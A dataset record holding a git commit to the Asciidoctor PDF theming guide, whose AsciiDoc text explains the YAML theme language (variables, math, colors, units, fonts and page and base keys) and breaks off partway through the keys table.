r\u00e9sultat de la fonction est r\u00e9cup\u00e9r\u00e9, dans notre cas le calcul du b\u00e9n\u00e9fice : \n\n[source,java]\n----\npublic T calculate() {\n return this.function.apply(value);\n}\n----\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e9213398a07b17cc7c5540ef710e176835ad40bc","subject":"fix missing colon after ulist key name in theming guide","message":"fix missing colon after ulist key name in theming guide\n","repos":"mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # #]\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nIMPORTANT: If you're creating a custom theme, you're expected to supply your own fonts.\nWe recognize this can be a major obstacle when you're starting out.\nTherefore, your other option is to simply redeclare the fonts from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] in the <<Custom Fonts,font catalog>>.\nAsciidoctor PDF will then resolve the fonts that are bundled with the gem.\n\nWARNING: If you don't declare your own fonts, the built-in (AFM) fonts declared in https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme] will be used instead.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* Underscores (`_`) can be used in place of hyphens (`-`) for all property names in the theme language.\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font_style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `text_align` property from CSS is the `align` property in the theme language.\n* The `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_spacing: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_spacing\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\nInstead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two more spaces of indentation than the parent level.\nAlso note the presence of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n - Enumerated type (where specified)\n - Text content (where specified)\n* Null (clears any previously assigned value)\n - _empty_ (i.e., no value specified)\n - null\n - ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principle feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* text_transform\n* line_height (currently some exceptions)\n* margin_bottom (if not specified, defaults to $vertical_spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading_h2_font_size`), then to the heading category (e.g., `heading_font_size`), then directly to the base value (e.g., `base_font_size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary: #E0162B {conum-guard-yaml} <1>\n secondary: '#FFFFFF' {conum-guard-yaml} <2>\n alert: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as it would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_primary\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations to support calculated values.\nLike programming languages, multiple and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the units defaults to pt.\n\nHowever, us humans like to think in real world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inches\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Points\n|pt (default)\n|===\n\n. A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nIMPORTANT: Numbers with more than two digits should be written as a float (e.g., 100.0), a math expression (e.g, 1 * 100), or with a unit (e.g., 100pt).\nOtherwise, the value may be misinterpreted as a hex color (e.g., '100') and could cause the converter to crash.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, whereever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nMany places where font properties can be specified, a case transformation can be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as it would normally be the case in YAML.\n\nYou also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nIn this case, the image is resolved relative to theme directory.\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nIn this case, the image is resolved relative to the value of the `imagesdir` attribute.\nWrapping the value in the image macro sends a hint to the converter to resolve it just like other images.\n\nLike in the AsciiDoc syntax, the inline image macro allows you to supply set the width of the image and the alignment:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center] \n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.\nYou can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.\nIf you need to add an underline or strikethrough decoration to the text, you can assign the `underline` or `line-through` to the `class` attribute on any aforementioned element.\n\nHere's an example of using formatting in the content of the menu caret:\n\n[source,yaml]\n----\nmenu_caret_content: \" <font size=\\\"1.15em\\\"><color rgb=\\\"#b12146\\\">\\u203a<\/color><\/font> \"\n----\n\nNOTE: The string must be double quoted in order to use a Unicode escape code like `\\u203a`.\n\nAdditionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.\n\n== Fonts\n\nYou can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\nIMPORTANT: Asciidoctor has no challenge working with Unicode.\nIn fact, it prefers Unicode and considers the entire range.\nHowever, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.\nThere's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.\n\n=== Built-In (AFM) Fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[width=33.33%]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\n\nCAUTION: Built-in fonts do not use the <<fallback-fonts,fallback fonts>>.\nIn order for the fallback font to kick in, you must be using a TrueType font.\n\n.WINANSI Encoding Behavior\n****\nWhen using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logic \"`not`\" glyph (`¬`) and you'll see the following warning in your console:\n\n The following text could not be fully converted to the Windows-1252 character set:\n | <string with unknown glyph>\n\nThis behavior differs from the default behavior in Prawn, which simply crashes.\n\nYou'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.\nTo prevent this warning, you need to specify a TrueType font.\n\nFor more information about how Prawn handles character encodings for built-in fonts, see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].\n****\n\n=== Bundled Fonts\n\nAsciidoctor PDF bundles several fonts that are used by the default theme.\nYou can also use these fonts in your custom theme by simply declaring them.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).\n\nThe family name of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[Noto Serif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[M+ 1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circuled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[M+ 1p Fallback]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUsed as the fallback font.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).\nThis limitation may be lifted in the future.\n\n=== Custom Fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a TTF file collection for the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so you need the italic style._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key that you assign to the font in the font catalog anywhere the `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nWhen Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.\nIn other words, Asciidoctor PDF automatically subsets the font.\nHowever, if you're storing the fonts in a repository, you may want to subset the font (for instance, by using FontForge) to reduce the space the font occupies in that storage.\nThis is simply a personal preference.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n Roboto Light:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\nTIP: Text in SVGs will use the font catalog from your theme.\nWe recommend that you match the font key to the name of the font seen by the operating system.\nThis will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF.\n\n=== Fallback Fonts\n\nIf a TrueType font is missing a character needed to render the document, such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.\nYou only need to specify a single fallback font, typically one that provides a full set of symbols.\n\nIMPORTANT: The fallback font is only used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).\nAny glyph missing from an AFM font is simply replaced with the \"`not`\" glyph (`¬`).\n\nCAUTION: Using the fallback font slows down PDF generation slightly because it has to analyze every single character.\nIt's use is not recommended for large documents.\nInstead, it's best to select primary fonts that have all the characters you need.\nKeep in mind that the default theme currently uses a fallback font, though this may change in the future.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/github.com\/android\/platform_frameworks_base\/blob\/master\/data\/fonts\/DroidSansFallback.ttf[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, add the key name to the `fallbacks` key under the `font_catalog` key.\nThe `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.\nHowever, we recommend using a single fallback font, if possible, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks:\n - DroidSansFallback\n----\n\nTIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.\n\nOf course, make sure you've configured your theme to use your custom font:\n\n[source,yaml]\n----\nbase:\n font_family: Roboto\n----\n\nThat's it!\nNow you're covered.\nIf your custom font is missing a glyph, Asciidoctor PDF will look in your fallback font.\nYou don't need to reference the fallback font anywhere else in your theme file.\n\n== Keys\n\nThis section lists all the keys that are available when creating a custom theme.\nThe keys are organized by category.\nEach category represents a common prefix under which the keys are typically nested.\n\nTIP: Keys can be nested wherever an underscore (`_`) appears in the name.\nThis nested structure is for organizational purposes only.\nAll keys are flatted when the theme is loaded (e.g., `align` nested under `base` becomes `base_align`).\n\nThe converter uses the values of these keys to control how most elements are arranged and styled in the PDF.\nThe default values listed in this section get inherited from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme].\n\nIMPORTANT: The https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] has a different set of values which are not shown in this guide.\n\nWhen creating a theme, all keys are optional.\nRequired keys are provided by the base theme.\nTherefore, you only have to declare keys that you want to override.\n\n[#keys-page]\n=== Page\n\nThe keys in this category control the size, margins and background of each page (i.e., canvas).\nWe recommended that you define this category before all other categories.\n\nNOTE: The background of the title page can be styled independently.\nSee <<Title Page>> for details.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: #ffffff)\n|page:\n background_color: #fefefe\n\n|background_image^[1]^\n|Inline image macro^[2]^ +\n(default: _not set_)\n|page:\n background_image: image:page-bg.png[]\n\n|layout\n|portrait {vbar} landscape +\n(default: portrait)\n|page:\n layout: landscape\n\n|margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 36)\n|page:\n margin: [0.5in, 0.67in, 1in, 0.67in]\n\n|margin_inner^[3]^\n|<<measurement-units,Measurement>> +\n(default: 48)\n|page:\n margin_inner: 0.75in\n\n|margin_outer^[3]^\n|<<measurement-units,Measurement>> +\n(default: 24)\n|page:\n margin_outer: 0.59in\n\n|size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +\n(default: A4)\n|page:\n size: Letter\n|===\n\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin_inner and margin_outer values.\nThese margins and used when the value `prepress` is assigned to the `media` document attribute.\n\n[#keys-base]\n=== Base\n\nThe keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.\nWe recommended that you define this category after the page category and before all other categories.\n\nNOTE: While it's common to define additional keys in this category (e.g., `base_border_radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|base:\n align: justify\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|base:\n border_color: #eeeeee\n\n\/\/ border_radius is variable, not an official key\n\/\/|border_radius\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|base:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: #000000)\n|base:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Helvetica)\n|base:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 